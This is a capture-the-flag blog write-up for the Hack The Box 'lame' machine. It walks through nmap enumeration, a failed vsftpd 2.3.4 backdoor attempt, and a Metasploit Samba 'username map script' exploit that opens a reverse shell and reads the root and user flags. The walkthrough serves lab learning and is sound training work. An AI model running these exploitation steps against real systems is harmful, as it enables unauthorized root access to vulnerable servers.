<!DOCTYPE html>


<html lang="en-us" data-theme="">
<head>
    
        
<meta charset="utf-8">
<meta name="HandheldFriendly" content="True">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer-when-downgrade">

<title>Hackthebox: lame - ins3cure.com</title>
<meta name="description" content="You&#39;d better check your S3 buckets before someone else does">

<link rel="icon" type="image/x-icon" href="https://ins3cure.com/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="https://ins3cure.com/favicon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-168677970-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-168677970-1');
</script>




    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.77f677c827f6d28cc36d9ebc5df12e45faaaf5475aa067dd6cc0c0485817a99c.css" integrity="sha256-d/Z3yCf20ozDbZ68XfEuRfqq9UdaoGfdbMDASFgXqZw=">
    





    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.c6fed49e746b6647061b86d63e3ffc352542c1c94153560619db0da4f976fca2.css" integrity="sha256-xv7UnnRrZkcGG4bWPj/8NSVCwclBU1YGGdsNpPl2/KI=">
    





<meta property="og:title" content="Hackthebox: lame" />
<meta property="og:description" content="hackthebox lame writeup" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/htb/lame/" /><meta property="og:image" content="https://ins3cure.com/images/og-featured.png"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-06-22T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-06-22T00:00:00+00:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://ins3cure.com/images/og-featured.png"/>

<meta name="twitter:title" content="Hackthebox: lame"/>
<meta name="twitter:description" content="hackthebox lame writeup"/>










<script async src="https://www.googletagmanager.com/gtag/js?id=G-18687JCG0Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-18687JCG0Q');
</script>



    
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

</head>
<body>
    <a class="skip-main" href="#main">Skip to main content</a>
    <div class="container">
        <header class="common-header"> 
            
                <h1 class="site-title">
    <a href="/"><span class="cursor">% </span>ins3cure.com</a><span class="logo_cursor"></span>
</h1>

    <nav>
        
        
        <a class="" href="https://ins3cure.com/categories/" title="Categories">Categories</a>
        
        <a class="" href="https://ins3cure.com/tags/" title="Tags">Tags</a>
        
    </nav>


            
        </header>
        <main id="main" tabindex="-1"> 
            
    
    
    <article class="post">
        <header class="post-header">
            <h1 class="post-title">Hackthebox: lame</h1>
    </header>
    

    


<div class="post-info">
    
    <div class="post-date">Posted Monday, Jun 22, 2020</div>
    

    <div class="post-taxonomies">
        
            <ul class="post-tags">
                
                    <li><a href="https://ins3cure.com/tags/ctf">#ctf</a></li>
                
                    <li><a href="https://ins3cure.com/tags/hacking">#hacking</a></li>
                
                    <li><a href="https://ins3cure.com/tags/htb">#htb</a></li>
                
            </ul>
        
    </div>
</div>

        <div class="content">
            <p>I&rsquo;ve spent quite some time in the <a href="https://hackthebox.eu">hackthebox</a> platform so why not make my notes public?</p>
<p>This is my first writeup. As usual, the box is lame. It comes &ldquo;as is&rdquo; from my notes, but I&rsquo;ll try to make it more meaningful and explanatory in the future.</p>
<h2 id="enumeration">Enumeration</h2>
<p>First things first. Let&rsquo;s start with the usual scan:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">map -A -T4 -v 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed <span style="color:#f92672">(</span>FTP code 230<span style="color:#f92672">)</span>
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is <span style="color:#ae81ff">300</span>
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 <span style="color:#f92672">(</span>protocol 2.0<span style="color:#f92672">)</span>
| ssh-hostkey:
|   <span style="color:#ae81ff">1024</span> 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd <span style="color:#f92672">(</span>DSA<span style="color:#f92672">)</span>
|_  <span style="color:#ae81ff">2048</span> 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X <span style="color:#f92672">(</span>workgroup: WORKGROUP<span style="color:#f92672">)</span>
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian <span style="color:#f92672">(</span>workgroup: WORKGROUP<span style="color:#f92672">)</span></code></pre></div>
<p>It&rsquo;s funny, I use to run <code>nmap</code>in a different way now:</p>
<pre tabindex="0"><code>nmap -sC -sV -oA output/file &lt;target&gt;
</code></pre><p>So we have:</p>
<ul>
<li>ssh — we can skip it, ssh is not usually vulnerable</li>
<li>samba 3.0.20</li>
<li>ftp
<ul>
<li>vsftpd 2.3.4</li>
</ul>
</li>
</ul>
<p>Let&rsquo;s search for exploits in metasploit:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">searchsploit vsftpd 2.3.4
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution <span style="color:#f92672">(</span>Metasploit<span style="color:#f92672">)</span>                                        | unix/remote/17491.rb
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results</code></pre></div>
<p>Interesting. There is a known vulnerability for the <code>vsftp</code> version running in the box. I would say these boxes where you have a CVE are easy. And yhis particular linux box is one of the easiest.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msfdb start
msfconsole
search vsftpd 2.3.4
Matching Modules
<span style="color:#f92672">================</span>
 
 <span style="color:#75715e"># Name Disclosure Date Rank Check Description</span>
 - ---- --------------- ---- ----- -----------
 <span style="color:#ae81ff">0</span> auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
 <span style="color:#ae81ff">1</span> exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
 <span style="color:#ae81ff">2</span> exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts <span style="color:#ae81ff">2</span> Namespace Redirect OGNL Injection
 <span style="color:#ae81ff">3</span> exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
 
msf5 &gt; use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; show
show actions    show auxiliary  show exploits   show nops       show plugins   
show advanced   show encoders   show info       show options    show post      
show all        show evasion    show missing    show payloads   show targets   
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; show options
 
Module options <span style="color:#f92672">(</span>exploit/unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span>:
 
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host<span style="color:#f92672">(</span>s<span style="color:#f92672">)</span>, range CIDR identifier, or hosts file with syntax <span style="color:#e6db74">&#39;file:&lt;path&gt;&#39;</span>
   RPORT   <span style="color:#ae81ff">21</span>               yes       The target port <span style="color:#f92672">(</span>TCP<span style="color:#f92672">)</span>
 
 
Exploit target:
 
   Id  Name
   --  ----
   <span style="color:#ae81ff">0</span>   Automatic
 
 
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; set rhosts 10.10.10.3
rhosts <span style="color:#f92672">=</span>&gt; 10.10.10.3
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; run
 
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Exploit completed, but no session was created.
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; exploit
 
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Exploit completed, but no session was created.
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; back
msf5 &gt; exit</code></pre></div>
<p>Mmm, it seems it does not work.</p>
<p>We also have samba 3.0.20, let`s trye:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">searchsploit samba 3.0.20
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Samba 3.0.10 &lt; 3.3.5 - Format String / Security Bypass                  | multiple/remote/10095.txt
Samba 3.0.20 &lt; 3.0.25rc3 - <span style="color:#e6db74">&#39;Username&#39;</span> map script<span style="color:#960050;background-color:#1e0010">&#39;</span> Command Execution <span style="color:#f92672">(</span>Me | unix/remote/16320.rb
Samba &lt; 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba &lt; 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba &lt; 3.6.2 <span style="color:#f92672">(</span>x86<span style="color:#f92672">)</span> - Denial of Service <span style="color:#f92672">(</span>PoC<span style="color:#f92672">)</span>                           | linux_x86/dos/36741.py
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results</code></pre></div>
<p>Again, we have suitable CVEs. Let&rsquo;s go for it!</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 &gt; search usermap
 
Matching Modules
<span style="color:#f92672">================</span>
 
   <span style="color:#75715e">#  Name                                Disclosure Date  Rank       Check  Description</span>
   -  ----                                ---------------  ----       -----  -----------
   <span style="color:#ae81ff">0</span>  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba <span style="color:#e6db74">&#34;username map script&#34;</span> Command Execution
 
 
msf5 &gt; use exploit/multi/samba/usermap_script
msf5 exploit<span style="color:#f92672">(</span>multi/samba/usermap_script<span style="color:#f92672">)</span> &gt; set rhosts 10.10.10.3
rhosts <span style="color:#f92672">=</span>&gt; 10.10.10.3
msf5 exploit<span style="color:#f92672">(</span>multi/samba/usermap_script<span style="color:#f92672">)</span> &gt; exploit
 
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Started reverse TCP double handler on 10.10.14.15:4444
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Accepted the first client connection...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Accepted the second client connection...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Command: echo hQ7DHGJcIvMlpKXV;
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Writing to socket A
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Writing to socket B
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Reading from sockets...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Reading from socket B
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> B: <span style="color:#e6db74">&#34;hQ7DHGJcIvMlpKXV\r\n&#34;</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Matching...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> A is input...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Command shell session <span style="color:#ae81ff">1</span> opened <span style="color:#f92672">(</span>10.10.14.15:4444 -&gt; 10.10.10.3:56484<span style="color:#f92672">)</span> at 2020-06-22 12:39:54 -0400
 
who
root pts/0 Jun <span style="color:#ae81ff">19</span> 05:31 <span style="color:#f92672">(</span>:0.0<span style="color:#f92672">)</span>
We<span style="color:#e6db74">&#39;re done, this one is trivial. Let&#39;</span>s try to get the flag hashes.
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt   
92...df
     
ls /home
ftp
makis
service
user
    
ls /home/makis
user.txt
 
cat /home/makis/user.txt
69...c5</code></pre></div>
<p>Funny enough, we got the <em>root</em> flag before the <em>user</em> flag. This may happen in some more machines.</p>

        </div>
    </article>

    
        
    <div class="pagination post-pagination">
        <div class="left pagination-item ">
            
                <a href="/tmux-cheat-sheet/">← Tmux Cheat Sheet</a>
            
        </div>
        <div class="right pagination-item ">
            
                <a href="/configuring-mutt/">Configuring mutt →</a>
            
        </div>
    </div>

    

    
        <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "ins3cure-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    


        </main>
        
            <footer class="common-footer">
    
    

    <div class="common-footer-bottom">
        
        <div class="copyright">
            <p>Mandatory legal stuff:
            <a href="/legal">Legal notice</a> · 
            <a href="/privacy">Privacy policy</a> · 
            <a href="/cookies">Cookie policy</a><br>
            © ins3cure.com, 2022 · <a href="/about">About us</a><br>
            Powered by <a target="_blank" rel="noopener noreferrer" href="https://gohugo.io/">Hugo</a>, theme based on <a target="_blank" rel="noopener noreferrer" href="https://github.com/mitrichius/hugo-theme-anubis">Anubis</a>.
            </p>  
        </div> 

        

    



    <button class="theme-switcher">
        Dark theme
    </button>

    <script>
    const STORAGE_KEY = 'user-color-scheme'
    const defaultTheme = "auto"

    let currentTheme
    let switchButton
    let autoDefinedScheme = window.matchMedia('(prefers-color-scheme: dark)')

    const autoChangeScheme = e => {
        currentTheme = e.matches ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', currentTheme)
        changeButtonText()
    }

    document.addEventListener('DOMContentLoaded', function() {
        switchButton = document.querySelector('.theme-switcher')
        currentTheme = detectCurrentScheme()
        if (currentTheme == 'dark') {
            document.documentElement.setAttribute('data-theme', 'dark')
        }
        if (currentTheme == 'auto') {
            autoChangeScheme(autoDefinedScheme);
            autoDefinedScheme.addListener(autoChangeScheme);
        }
        changeButtonText()
        switchButton.addEventListener('click', switchTheme, false)
    })

    function detectCurrentScheme() {
        if (localStorage.getItem(STORAGE_KEY)) {
            return localStorage.getItem(STORAGE_KEY)
        } 
        if (defaultTheme) {
            return defaultTheme
        } 
        if (!window.matchMedia) {
            return 'light'
        } 
        if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
            return 'dark'
        }
        return 'light'
    }

    function changeButtonText()
    {   
        switchButton.textContent = currentTheme == 'dark' ?  "Light theme" : "Dark theme"
    }

    function switchTheme(e) {
        if (currentTheme == 'dark') {
            localStorage.setItem(STORAGE_KEY, 'light')
            document.documentElement.setAttribute('data-theme', 'light')
            currentTheme = 'light'
        } else {
            localStorage.setItem(STORAGE_KEY, 'dark')
            document.documentElement.setAttribute('data-theme', 'dark')
            currentTheme = 'dark'
        }
        changeButtonText()
    }
    </script>
   
    </div>
</footer>

        
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>
<script>
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#252e39"
    },
    "button": {
      "background": "#14a7d0"
    }
  },
  "theme": "classic",
  "content": {
    "message": "This website uses cookies to ensure you get the best experience on our website",
    "dismiss": "Got it!",
    "link": "Learn more",
    "href": "/cookiepolicy"
  }
});
</script>
</body>
</html>
